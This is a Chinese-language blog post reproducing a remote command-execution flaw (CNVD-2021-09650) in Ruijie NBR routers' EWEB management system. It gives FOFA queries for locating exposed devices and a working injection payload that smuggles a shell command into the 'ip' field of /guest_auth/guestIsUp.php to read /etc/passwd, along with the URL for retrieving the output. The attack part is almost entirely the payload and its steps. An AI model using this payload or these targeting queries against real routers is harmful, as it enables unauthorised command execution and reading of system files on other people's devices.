锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)

| | | | 147

漏洞描述

i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限

漏洞影响

s ✅锐捷NBR路由器 EWEB网管系统

空间测绘

d ⭕FOFA:title="锐捷网络-EWEB网管系统"

FOFA:icon_hash="-692947551"

漏洞复现

  • ✅访问首页

image-20220414212324788

  • ✅执行Payload命令
1
2
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

image-20220414212629480

  • 然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果

image-20220414212716512

个人博客

孤桜懶契:https://gylq.gitee.io/time

本文标题:锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)

文章作者:孤桜懶契

发布时间:2022年04月14日 - 21:21:38

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/19.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️